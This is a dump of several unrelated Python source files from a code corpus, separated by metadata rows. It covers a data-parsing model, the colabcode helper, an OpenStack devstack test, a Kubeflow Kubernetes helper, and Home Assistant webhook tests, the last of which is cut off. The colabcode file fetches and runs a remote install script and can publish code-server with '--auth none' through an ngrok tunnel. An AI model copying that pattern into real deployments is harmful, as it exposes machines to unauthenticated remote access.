| 30.964286 | 69 | 0.665513 | [
"MPL-2.0"
] | SekhmetDesign/bedrock | lib/l10n_utils/management/commands/l10n_merge.py | 867 | Python |
#-*- coding: utf-8 -*-
from DBP.models import Base, session
from DBP.models.user import User
from sqlalchemy.orm import class_mapper
from sqlalchemy.inspection import inspect
from sqlalchemy.sql import func
from sqlalchemy.dialects.mysql import INTEGER,VARCHAR, DATETIME
from datetime import datetime
import csv
import io
from openpyxl import Workbook
from openpyxl import load_workbook
def utf_8_encoder(unicode_csv_data):
for line in unicode_csv_data:
yield line.encode('utf-8')
class OriginalData (object):
def __init__(self, length, name, mappinginfo):
self.length = length
self.name = name
cols = inspect(self.__class__).columns
if len(mappinginfo) != len(cols) -3:
raise TypeError
for col in mappinginfo:
setattr(self,str( u"sch_"+col["label"]["name"]),int(col["col"]))
def dict(self):
data = {
"id" : self.id,
"length" : self.length,
"name" : self.name,
"mapinfo" : self.mapList()
}
return data
def getInfo(self):
data = self.dict()
data["parsednum"] = len(self.parseds)
data["tasknum"] = sum(map(lambda x: len(x.tasks),self.parseds))
return data
def mapList(self):
maplist = list()
for col in filter(lambda x: x.name[:3] == u"sch", inspect(self.__class__).columns ):
maplist.append(getattr(self,col.name))
return maplist
def getSchema(self):
return filter(lambda x: x.name[:3] == u"sch", inspect(self.__class__).columns )
def loadcsv(self,submitter,csvread,nth,duration_start,duration_end):
reader = csv.reader(csvread, delimiter=',', quotechar="'")
csvwrite = io.BytesIO()
writer = csv.writer(csvwrite, delimiter=',', quotechar="'")
maplist = self.mapList()
counter = 0
dupset = set()
dupcounter = 0
nullcount = dict()
schema = self.getSchema()
for col in schema:
nullcount[col.name] = 0
for rrow in reader:
crow = list()
for mapnum, col in zip(maplist, schema):
crow.append(rrow[mapnum])
if rrow[mapnum] == "":
nullcount[col.name] +=1
dupset.add(unicode(crow))
writer.writerow(crow)
counter += 1
evaluator = User.randomEvaluator()
parsedmodel = self.parsedclass(nth,duration_start,duration_end,csvwrite,counter, counter - len(dupset))
parsedmodel.submitterid = submitter.id
parsedmodel.evaluatorid = evaluator.id
self.taskrow.addUser(evaluator)
for col in schema :
setattr(parsedmodel,"null_" + col.name[4:] , nullcount[col.name] / (counter*1.0) )
self.parseds.append(parsedmodel)
session.commit()
return parsedmodel
def loadxlsx(self,submitter,xlsxread,nth,duration_start,duration_end):
wb = load_workbook(xlsxread)
ws = wb.active
csvwrite = io.BytesIO()
writer = csv.writer(csvwrite, delimiter=',', quotechar="'")
maplist = self.mapList()
counter = 0
dupset = set()
dupcounter = 0
nullcount = dict()
schema = self.getSchema()
for col in schema:
nullcount[col.name] = 0
for rrow in ws.rows:
crow = list()
for mapnum, col in zip(maplist, schema):
if type(rrow[mapnum].value) == datetime:
crow.append(rrow[mapnum].value.strftime("%Y-%m-%d %H:%M"))
else :
crow.append(rrow[mapnum].value)
if rrow[mapnum].value == "":
nullcount[col.name] +=1
dupset.add(unicode(crow))
utfrow = list ()
for x in crow:
if type(x) == unicode :
utfrow.append(x.encode("utf8"))
else :
utfrow.append(x)
writer.writerow(utfrow)
counter += 1
evaluator = User.randomEvaluator()
parsedmodel = self.parsedclass(nth,duration_start,duration_end,csvwrite,counter, counter - len(dupset))
parsedmodel.submitterid = submitter.id
parsedmodel.evaluatorid = evaluator.id
self.taskrow.addUser(evaluator)
for col in schema :
setattr(parsedmodel,"null_" + col.name[4:] , nullcount[col.name] / (counter*1.0) )
self.parseds.append(parsedmodel)
session.commit()
return parsedmodel
def getInfoByUser(self,user):
data = self.dict()
data["nth"] = self.getNextnth (user)
return data
def getNextnth(self,user):
nth = session.query( func.max(self.parsedclass.nth)).filter(self.parsedclass.originalid == self.id).filter(self.parsedclass.submitterid == user.id).first()
if nth[0]:
return nth[0] +1
else :
return 1
class ParsedData (object):
def __init__(self,nth,duration_start,duration_end, csvfile, tuplenum,duplicatetuplenum):
self.nth = nth
self.duration_start = duration_start
self.duration_end = duration_end
self.file = csvfile.getvalue()
self.tuplenum = tuplenum
self.duplicatetuplenum = duplicatetuplenum
def parsecsv(self):
csvread = io.StringIO(self.file.decode("utf8"))
reader = csv.reader(utf_8_encoder(csvread), delimiter=',', quotechar="'")
parsedlist = list()
for row in reader:
tsmodel = self.taskclass(User.getUser(self.submitterid).name, self.id)
for (column, data) in zip(filter(lambda x: x.name[:3] == u"sch", inspect(self.taskclass).columns ), row):
if type(column.type) == INTEGER:
try :
setattr(tsmodel,column.name, int(data))
except :
setattr(tsmodel,column.name, None)
elif type(column.type) == DATETIME:
try :
setattr(tsmodel,column.name, datetime.strptime( data, "%Y-%m-%d %H:%M"))
except :
setattr(tsmodel,column.name, None)
else :
setattr(tsmodel,column.name, data)
parsedlist.append(tsmodel)
return parsedlist
def insertcsv(self):
if self.pnp != "Pass":
return False
session.bulk_save_objects(self.parsecsv())
session.commit()
return True
def dict(self):
return {
"id" : self.id,
"nth" : self.nth,
"tuplenum" : self.tuplenum,
"duplicatetuplenum" : self.duplicatetuplenum,
"duration_start" : self.duration_start.isoformat(),
"duration_end" : self.duration_end.isoformat(),
"status" : self.status,
"score" : self.score,
"pnp" : self.pnp,
"submitter" : User.getUser(self.submitterid).name,
"original" : self.original.name,
"evaluator": User.getUser(self.evaluatorid).name,
"nullratio" : self.nullInfo()
}
def evaluate(self, score,pnp):
self.status = "Evaluated"
self.score = 5 * score + 25 *( 1.0 - self.duplicatetuplenum/(self.tuplenum * 1.0) ) + 25 * (1.0 - sum(map(lambda x : x['ratio'] ,self.nullInfo()))/(len(self.nullInfo())*1.0))
self.pnp = pnp
session.commit()
def nullInfo(self):
nulllist = list()
for col in filter(lambda x: x.name[:4] == u"null", inspect(self.__class__).columns ):
nulllist.append(dict(ratio=getattr(self,col.name) ,name = col.name[5:] ))
return nulllist
class TaskData (object):
def __init__ (self,submittername, parsedid):
self.submittername = submittername
self.parsedid = parsedid
| 24.083333 | 176 | 0.68136 | [
"MIT"
] | Pusnow/DB-Project | DBP/models/instance.py | 6,647 | Python |
import os
import subprocess
import uuid
import nest_asyncio
import uvicorn
from pyngrok import ngrok
try:
from google.colab import drive
colab_env = True
except ImportError:
colab_env = False
EXTENSIONS = ["ms-python.python", "ms-toolsai.jupyter", "mechatroner.rainbow-csv", "vscode-icons-team.vscode-icons", "dongli.python-preview", "njpwerner.autodocstring"]
CODESERVER_VERSION = "3.10.2"
class ColabCode:
def __init__(
self,
port=10000,
password=None,
authtoken=None,
mount_drive=False,
code=True,
lab=False,
):
self.port = port
self.password = password
self.authtoken = authtoken
self._mount = mount_drive
self._code = code
self._lab = lab
if self._lab:
self._start_server()
self._run_lab()
if self._code:
self._install_code()
self._install_extensions()
self._start_server()
self._run_code()
@staticmethod
def _install_code():
subprocess.run(["wget", "https://code-server.dev/install.sh"], stdout=subprocess.PIPE)
subprocess.run(
["sh", "install.sh", "--version", f"{CODESERVER_VERSION}"],
stdout=subprocess.PIPE,
)
@staticmethod
def _install_extensions():
for ext in EXTENSIONS:
subprocess.run(["code-server", "--install-extension", f"{ext}"])
def _start_server(self):
if self.authtoken:
ngrok.set_auth_token(self.authtoken)
active_tunnels = ngrok.get_tunnels()
for tunnel in active_tunnels:
public_url = tunnel.public_url
ngrok.disconnect(public_url)
url = ngrok.connect(addr=self.port, bind_tls=True)
if self._code:
print(f"Code Server can be accessed on: {url}")
else:
print(f"Public URL: {url}")
def _run_lab(self):
token = str(uuid.uuid1())
print(f"Jupyter lab token: {token}")
base_cmd = "jupyter-lab --ip='localhost' --allow-root --ServerApp.allow_remote_access=True --no-browser"
os.system(f"fuser -n tcp -k {self.port}")
if self._mount and colab_env:
drive.mount("/content/drive")
if self.password:
lab_cmd = f" --ServerApp.token='{token}' --ServerApp.password='{self.password}' --port {self.port}"
else:
lab_cmd = f" --ServerApp.token='{token}' --ServerApp.password='' --port {self.port}"
lab_cmd = base_cmd + lab_cmd
with subprocess.Popen(
[lab_cmd],
shell=True,
stdout=subprocess.PIPE,
bufsize=1,
universal_newlines=True,
) as proc:
for line in proc.stdout:
print(line, end="")
def _run_code(self):
os.system(f"fuser -n tcp -k {self.port}")
if self._mount and colab_env:
drive.mount("/content/drive")
if self.password:
code_cmd = f"PASSWORD={self.password} code-server --port {self.port} --disable-telemetry"
else:
code_cmd = f"code-server --port {self.port} --auth none --disable-telemetry"
with subprocess.Popen(
[code_cmd],
shell=True,
stdout=subprocess.PIPE,
bufsize=1,
universal_newlines=True,
) as proc:
for line in proc.stdout:
print(line, end="")
def run_app(self, app, workers=1):
self._start_server()
nest_asyncio.apply()
uvicorn.run(app, host="127.0.0.1", port=self.port, workers=workers)
| 31.205128 | 168 | 0.579567 | [
"MIT"
] | pandya6988/colabcode | colabcode/code.py | 3,651 | Python |
# Copyright (C) 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
import unittest
from devstack_local_conf import LocalConf
from collections import OrderedDict
class TestDevstackLocalConf(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_plugins(self):
"Test that plugins without dependencies work"
localrc = {'test_localrc': '1'}
local_conf = {'install':
{'nova.conf':
{'main':
{'test_conf': '2'}}}}
services = {'cinder': True}
# We use ordereddict here to make sure the plugins are in the
# *wrong* order for testing.
plugins = OrderedDict([
('bar', 'git://git.openstack.org/openstack/bar-plugin'),
('foo', 'git://git.openstack.org/openstack/foo-plugin'),
('baz', 'git://git.openstack.org/openstack/baz-plugin'),
])
p = dict(localrc=localrc,
local_conf=local_conf,
base_services=[],
services=services,
plugins=plugins,
base_dir='./test',
path=os.path.join(self.tmpdir, 'test.local.conf'))
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'),
p.get('projects'),
p.get('project'))
lc.write(p['path'])
plugins = []
with open(p['path']) as f:
for line in f:
if line.startswith('enable_plugin'):
plugins.append(line.split()[1])
self.assertEqual(['bar', 'baz', 'foo'], plugins)
def test_plugin_deps(self):
"Test that plugins with dependencies work"
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', '.git'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', '.git'))
with open(os.path.join(
self.tmpdir,
'foo-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin foo\n')
with open(os.path.join(
self.tmpdir,
'bar-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin bar\n')
f.write('plugin_requires bar foo\n')
localrc = {'test_localrc': '1'}
local_conf = {'install':
{'nova.conf':
{'main':
{'test_conf': '2'}}}}
services = {'cinder': True}
# We use ordereddict here to make sure the plugins are in the
# *wrong* order for testing.
plugins = OrderedDict([
('bar', 'git://git.openstack.org/openstack/bar-plugin'),
('foo', 'git://git.openstack.org/openstack/foo-plugin'),
])
p = dict(localrc=localrc,
local_conf=local_conf,
base_services=[],
services=services,
plugins=plugins,
base_dir=self.tmpdir,
path=os.path.join(self.tmpdir, 'test.local.conf'))
def test_libs_from_git(self):
"Test that LIBS_FROM_GIT is auto-generated"
projects = {
'git.openstack.org/openstack/nova': {
'required': True,
'short_name': 'nova',
},
'git.openstack.org/openstack/oslo.messaging': {
'required': True,
'short_name': 'oslo.messaging',
},
'git.openstack.org/openstack/devstack-plugin': {
'required': False,
'short_name': 'devstack-plugin',
},
}
project = {
'short_name': 'glance',
}
p = dict(base_services=[],
base_dir='./test',
path=os.path.join(self.tmpdir, 'test.local.conf'),
projects=projects,
project=project)
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'),
p.get('projects'),
p.get('project'))
lc.write(p['path'])
lfg = None
with open(p['path']) as f:
for line in f:
if line.startswith('LIBS_FROM_GIT'):
lfg = line.strip().split('=')[1]
self.assertEqual('nova,oslo.messaging,glance', lfg)
def test_overridelibs_from_git(self):
"Test that LIBS_FROM_GIT can be overridden"
localrc = {'LIBS_FROM_GIT': 'oslo.db'}
projects = {
'git.openstack.org/openstack/nova': {
'required': True,
'short_name': 'nova',
},
'git.openstack.org/openstack/oslo.messaging': {
'required': True,
'short_name': 'oslo.messaging',
},
'git.openstack.org/openstack/devstack-plugin': {
'required': False,
'short_name': 'devstack-plugin',
},
}
p = dict(localrc=localrc,
base_services=[],
base_dir='./test',
path=os.path.join(self.tmpdir, 'test.local.conf'),
projects=projects)
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'),
p.get('projects'),
p.get('project'))
lc.write(p['path'])
lfg = None
with open(p['path']) as f:
for line in f:
if line.startswith('LIBS_FROM_GIT'):
lfg = line.strip().split('=')[1]
self.assertEqual('oslo.db', lfg)
def test_plugin_circular_deps(self):
"Test that plugins with circular dependencies fail"
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', '.git'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', '.git'))
with open(os.path.join(
self.tmpdir,
'foo-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin foo\n')
f.write('plugin_requires foo bar\n')
with open(os.path.join(
self.tmpdir,
'bar-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin bar\n')
f.write('plugin_requires bar foo\n')
localrc = {'test_localrc': '1'}
local_conf = {'install':
{'nova.conf':
{'main':
{'test_conf': '2'}}}}
services = {'cinder': True}
# We use ordereddict here to make sure the plugins are in the
# *wrong* order for testing.
plugins = OrderedDict([
('bar', 'git://git.openstack.org/openstack/bar-plugin'),
('foo', 'git://git.openstack.org/openstack/foo-plugin'),
])
p = dict(localrc=localrc,
local_conf=local_conf,
base_services=[],
services=services,
plugins=plugins,
base_dir=self.tmpdir,
path=os.path.join(self.tmpdir, 'test.local.conf'))
with self.assertRaises(Exception):
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'))
lc.write(p['path'])
if __name__ == '__main__':
unittest.main()
| 37.889831 | 72 | 0.497652 | [
"Apache-2.0"
] | HoonMinJeongUm/HoonMin-devstack | roles/write-devstack-local-conf/library/test.py | 8,942 | Python |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from kubernetes import client as k8s_client
from kubernetes import config
import time
import logging
import re
from .. import dsl
class K8sHelper(object):
""" Kubernetes Helper """
def __init__(self):
if not self._configure_k8s():
raise Exception('K8sHelper __init__ failure')
def _configure_k8s(self):
try:
config.load_kube_config()
logging.info('Found local kubernetes config. Initialized with kube_config.')
except:
logging.info('Cannot Find local kubernetes config. Trying in-cluster config.')
config.load_incluster_config()
logging.info('Initialized with in-cluster config.')
self._api_client = k8s_client.ApiClient()
self._corev1 = k8s_client.CoreV1Api(self._api_client)
return True
def _create_k8s_job(self, yaml_spec):
""" _create_k8s_job creates a kubernetes job based on the yaml spec """
pod = k8s_client.V1Pod(metadata=k8s_client.V1ObjectMeta(generate_name=yaml_spec['metadata']['generateName']))
container = k8s_client.V1Container(name = yaml_spec['spec']['containers'][0]['name'],
image = yaml_spec['spec']['containers'][0]['image'],
args = yaml_spec['spec']['containers'][0]['args'],
volume_mounts = [k8s_client.V1VolumeMount(
name=yaml_spec['spec']['containers'][0]['volumeMounts'][0]['name'],
mount_path=yaml_spec['spec']['containers'][0]['volumeMounts'][0]['mountPath'],
)],
env = [k8s_client.V1EnvVar(
name=yaml_spec['spec']['containers'][0]['env'][0]['name'],
value=yaml_spec['spec']['containers'][0]['env'][0]['value'],
)])
pod.spec = k8s_client.V1PodSpec(restart_policy=yaml_spec['spec']['restartPolicy'],
containers = [container],
service_account_name=yaml_spec['spec']['serviceAccountName'],
volumes=[k8s_client.V1Volume(
name=yaml_spec['spec']['volumes'][0]['name'],
secret=k8s_client.V1SecretVolumeSource(
secret_name=yaml_spec['spec']['volumes'][0]['secret']['secretName'],
)
)])
try:
api_response = self._corev1.create_namespaced_pod(yaml_spec['metadata']['namespace'], pod)
return api_response.metadata.name, True
except k8s_client.rest.ApiException as e:
logging.exception("Exception when calling CoreV1Api->create_namespaced_pod: {}\n".format(str(e)))
return '', False
def _wait_for_k8s_job(self, pod_name, yaml_spec, timeout):
""" _wait_for_k8s_job waits for the job to complete """
status = 'running'
start_time = datetime.now()
while status in ['pending', 'running']:
# Pod pending values: https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/V1PodStatus.md
try:
api_response = self._corev1.read_namespaced_pod(pod_name, yaml_spec['metadata']['namespace'])
status = api_response.status.phase.lower()
time.sleep(5)
elapsed_time = (datetime.now() - start_time).seconds
logging.info('{} seconds: waiting for job to complete'.format(elapsed_time))
if elapsed_time > timeout:
logging.info('Kubernetes job timeout')
return False
except k8s_client.rest.ApiException as e:
logging.exception('Exception when calling CoreV1Api->read_namespaced_pod: {}\n'.format(str(e)))
return False
return status == 'succeeded'
def _delete_k8s_job(self, pod_name, yaml_spec):
""" _delete_k8s_job deletes a pod """
try:
api_response = self._corev1.delete_namespaced_pod(pod_name, yaml_spec['metadata']['namespace'], body=k8s_client.V1DeleteOptions())
except k8s_client.rest.ApiException as e:
logging.exception('Exception when calling CoreV1Api->delete_namespaced_pod: {}\n'.format(str(e)))
def _read_pod_log(self, pod_name, yaml_spec):
try:
api_response = self._corev1.read_namespaced_pod_log(pod_name, yaml_spec['metadata']['namespace'])
except k8s_client.rest.ApiException as e:
logging.exception('Exception when calling CoreV1Api->read_namespaced_pod_log: {}\n'.format(str(e)))
return False
return api_response
def run_job(self, yaml_spec, timeout=600):
""" run_job runs a kubernetes job and clean up afterwards """
pod_name, succ = self._create_k8s_job(yaml_spec)
if not succ:
return False
# timeout in seconds
succ = self._wait_for_k8s_job(pod_name, yaml_spec, timeout)
if not succ:
logging.info('Kubernetes job failed.')
return False
#TODO: investigate the read log error
# print(self._read_pod_log(pod_name, yaml_spec))
self._delete_k8s_job(pod_name, yaml_spec)
return succ
@staticmethod
def sanitize_k8s_name(name):
"""From _make_kubernetes_name
sanitize_k8s_name cleans and converts the names in the workflow.
"""
return re.sub('-+', '-', re.sub('[^-0-9a-z]+', '-', name.lower())).lstrip('-').rstrip('-')
@staticmethod
def convert_k8s_obj_to_json(k8s_obj):
"""
Builds a JSON K8s object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
Args:
obj: The data to serialize.
Returns: The serialized form of data.
"""
from six import text_type, integer_types, iteritems
PRIMITIVE_TYPES = (float, bool, bytes, text_type) + integer_types
from datetime import date, datetime
if k8s_obj is None:
return None
elif isinstance(k8s_obj, PRIMITIVE_TYPES):
return k8s_obj
elif isinstance(k8s_obj, list):
return [K8sHelper.convert_k8s_obj_to_json(sub_obj)
for sub_obj in k8s_obj]
elif isinstance(k8s_obj, tuple):
return tuple(K8sHelper.convert_k8s_obj_to_json(sub_obj)
for sub_obj in k8s_obj)
elif isinstance(k8s_obj, (datetime, date)):
return k8s_obj.isoformat()
elif isinstance(k8s_obj, dsl.PipelineParam):
if isinstance(k8s_obj.value, str):
return k8s_obj.value
return '{{inputs.parameters.%s}}' % k8s_obj.full_name
if isinstance(k8s_obj, dict):
obj_dict = k8s_obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {k8s_obj.attribute_map[attr]: getattr(k8s_obj, attr)
for attr, _ in iteritems(k8s_obj.swagger_types)
if getattr(k8s_obj, attr) is not None}
return {key: K8sHelper.convert_k8s_obj_to_json(val)
for key, val in iteritems(obj_dict)} | 43.661202 | 136 | 0.637672 | [
"Apache-2.0"
] | JohnPaton/pipelines | sdk/python/kfp/compiler/_k8s_helper.py | 7,990 | Python |
"""Webhook tests for mobile_app."""
import logging
import pytest
from homeassistant.components.camera import SUPPORT_STREAM as CAMERA_SUPPORT_STREAM
from homeassistant.components.mobile_app.const import CONF_SECRET
from homeassistant.components.zone import DOMAIN as ZONE_DOMAIN
from homeassistant.const import CONF_WEBHOOK_ID
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.setup import async_setup_component
from .const import CALL_SERVICE, FIRE_EVENT, REGISTER_CLEARTEXT, RENDER_TEMPLATE, UPDATE
from tests.async_mock import patch
from tests.common import async_mock_service
_LOGGER = logging.getLogger(__name__)
def encrypt_payload(secret_key, payload):
"""Return a encrypted payload given a key and dictionary of data."""
try:
from nacl.secret import SecretBox
from nacl.encoding import Base64Encoder
except (ImportError, OSError):
pytest.skip("libnacl/libsodium is not installed")
return
import json
keylen = SecretBox.KEY_SIZE
prepped_key = secret_key.encode("utf-8")
prepped_key = prepped_key[:keylen]
prepped_key = prepped_key.ljust(keylen, b"\0")
payload = json.dumps(payload).encode("utf-8")
return (
SecretBox(prepped_key).encrypt(payload, encoder=Base64Encoder).decode("utf-8")
)
def decrypt_payload(secret_key, encrypted_data):
"""Return a decrypted payload given a key and a string of encrypted data."""
try:
from nacl.secret import SecretBox
from nacl.encoding import Base64Encoder
except (ImportError, OSError):
pytest.skip("libnacl/libsodium is not installed")
return
import json
keylen = SecretBox.KEY_SIZE
prepped_key = secret_key.encode("utf-8")
prepped_key = prepped_key[:keylen]
prepped_key = prepped_key.ljust(keylen, b"\0")
decrypted_data = SecretBox(prepped_key).decrypt(
encrypted_data, encoder=Base64Encoder
)
decrypted_data = decrypted_data.decode("utf-8")
return json.loads(decrypted_data)
async def test_webhook_handle_render_template(create_registrations, webhook_client):
"""Test that we render templates properly."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json=RENDER_TEMPLATE,
)
assert resp.status == 200
json = await resp.json()
assert json == {"one": "Hello world"}
async def test_webhook_handle_call_services(hass, create_registrations, webhook_client):
"""Test that we call services properly."""
calls = async_mock_service(hass, "test", "mobile_app")
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json=CALL_SERVICE,
)
assert resp.status == 200
assert len(calls) == 1
async def test_webhook_handle_fire_event(hass, create_registrations, webhook_client):
"""Test that we can fire events."""
events = []
@callback
def store_event(event):
"""Helepr to store events."""
events.append(event)
hass.bus.async_listen("test_event", store_event)
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]), json=FIRE_EVENT
)
assert resp.status == 200
json = await resp.json()
assert json == {}
assert len(events) == 1
assert events[0].data["hello"] == "yo world"
async def test_webhook_update_registration(webhook_client, authed_api_client):
"""Test that a we can update an existing registration via webhook."""
register_resp = await authed_api_client.post(
"/api/mobile_app/registrations", json=REGISTER_CLEARTEXT
)
assert register_resp.status == 201
register_json = await register_resp.json()
webhook_id = register_json[CONF_WEBHOOK_ID]
update_container = {"type": "update_registration", "data": UPDATE}
update_resp = await webhook_client.post(
f"/api/webhook/{webhook_id}", json=update_container
)
assert update_resp.status == 200
update_json = await update_resp.json()
assert update_json["app_version"] == "2.0.0"
assert CONF_WEBHOOK_ID not in update_json
assert CONF_SECRET not in update_json
async def test_webhook_handle_get_zones(hass, create_registrations, webhook_client):
"""Test that we can get zones properly."""
await async_setup_component(
hass, ZONE_DOMAIN, {ZONE_DOMAIN: {}},
)
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json={"type": "get_zones"},
)
assert resp.status == 200
json = await resp.json()
assert len(json) == 1
zones = sorted(json, key=lambda entry: entry["entity_id"])
assert zones[0]["entity_id"] == "zone.home"
async def test_webhook_handle_get_config(hass, create_registrations, webhook_client):
"""Test that we can get config properly."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json={"type": "get_config"},
)
assert resp.status == 200
json = await resp.json()
if "components" in json:
json["components"] = set(json["components"])
if "whitelist_external_dirs" in json:
json["whitelist_external_dirs"] = set(json["whitelist_external_dirs"])
hass_config = hass.config.as_dict()
expected_dict = {
"latitude": hass_config["latitude"],
"longitude": hass_config["longitude"],
"elevation": hass_config["elevation"],
"unit_system": hass_config["unit_system"],
"location_name": hass_config["location_name"],
"time_zone": hass_config["time_zone"],
"components": hass_config["components"],
"version": hass_config["version"],
"theme_color": "#03A9F4", # Default frontend theme color
}
assert expected_dict == json
async def test_webhook_returns_error_incorrect_json(
webhook_client, create_registrations, caplog
):
"""Test that an error is returned when JSON is invalid."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]), data="not json"
)
assert resp.status == 400
json = await resp.json()
assert json == {}
assert "invalid JSON" in caplog.text
async def test_webhook_handle_decryption(webhook_client, create_registrations):
"""Test that we can encrypt/decrypt properly."""
key = create_registrations[0]["secret"]
data = encrypt_payload(key, RENDER_TEMPLATE["data"])
container = {"type": "render_template", "encrypted": True, "encrypted_data": data}
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[0]["webhook_id"]), json=container
)
assert resp.status == 200
webhook_json = await resp.json()
assert "encrypted_data" in webhook_json
decrypted_data = decrypt_payload(key, webhook_json["encrypted_data"])
assert decrypted_data == {"one": "Hello world"}
async def test_webhook_requires_encryption(webhook_client, create_registrations):
"""Test that encrypted registrations only accept encrypted data."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[0]["webhook_id"]),
json=RENDER_TEMPLATE,
)
assert resp.status == 400
webhook_json = await resp.json()
assert "error" in webhook_json
assert webhook_json["success"] is False
assert webhook_json["error"]["code"] == "encryption_required"
async def test_webhook_update_location(hass, webhook_client, create_registrations):
"""Test that location can be updated."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json={
"type": "update_location",
"data": {"gps": [1, 2], "gps_accuracy": 10, "altitude": -10},
},
)
assert resp.status == 200
state = hass.states.get("device_tracker.test_1_2")
assert state is not None
assert state.attributes["latitude"] == 1.0
assert state.attributes["longitude"] == 2.0
assert state.attributes["gps_accuracy"] == 10
assert state.attributes["altitude"] == -10
async def test_webhook_enable_encryption(hass, webhook_client, create_registrations):
"""Test that encryption can be added to a reg initially created without."""
webhook_id = create_registrations[1]["webhook_id"]
enable_enc_resp = await webhook_client.post(
f"/api/webhook/{webhook_id}", json={"type": "enable_encryption"},
)
assert enable_enc_resp.status == 200
enable_enc_json = await enable_enc_resp.json()
assert len(enable_enc_json) == 1
assert CONF_SECRET in enable_enc_json
key = enable_enc_json["secret"]
enc_required_resp = await webhook_client.post(
f"/api/webhook/{webhook_id}", json=RENDER_TEMPLATE,
)
assert enc_required_resp.status == 400
enc_required_json = await enc_required_resp.json()
assert "error" in enc_required_json
assert enc_required_json["success"] is False
assert enc_required_json["error"]["code"] == "encryption_required"
enc_data = encrypt_payload(key, RENDER_TEMPLATE["data"])
container = {
"type": "render_template",
"encrypted": True,
"encrypted_data": enc_data,
}
enc_resp = await webhook_client.post(f"/api/webhook/{webhook_id}", json=container)
assert enc_resp.status == 200
enc_json = await enc_resp.json()
assert "encrypted_data" in enc_json
decrypted_data = decrypt_payload(key, enc_json["encrypted_data"])
assert decrypted_data == {"one": "Hello world"}
async def test_webhook_camera_stream_non_existent(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for a non-existent camera."""
webhook_id = create_registrations[1]["webhook_id"]
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.doesnt_exist"},
},
)
assert resp.status == 400
webhook_json = await resp.json()
assert webhook_json["success"] is False
async def test_webhook_camera_stream_non_hls(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for a non-HLS/stream-supporting camera."""
hass.states.async_set("camera.non_stream_camera", "idle", {"supported_features": 0})
webhook_id = create_registrations[1]["webhook_id"]
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.non_stream_camera"},
},
)
assert resp.status == 200
webhook_json = await resp.json()
assert webhook_json["hls_path"] is None
assert (
webhook_json["mjpeg_path"]
== "/api/camera_proxy_stream/camera.non_stream_camera"
)
async def test_webhook_camera_stream_stream_available(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for an HLS/stream-supporting camera."""
hass.states.async_set(
"camera.stream_camera", "idle", {"supported_features": CAMERA_SUPPORT_STREAM}
)
webhook_id = create_registrations[1]["webhook_id"]
with patch(
"homeassistant.components.camera.async_request_stream",
return_value="/api/streams/some_hls_stream",
):
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.stream_camera"},
},
)
assert resp.status == 200
webhook_json = await resp.json()
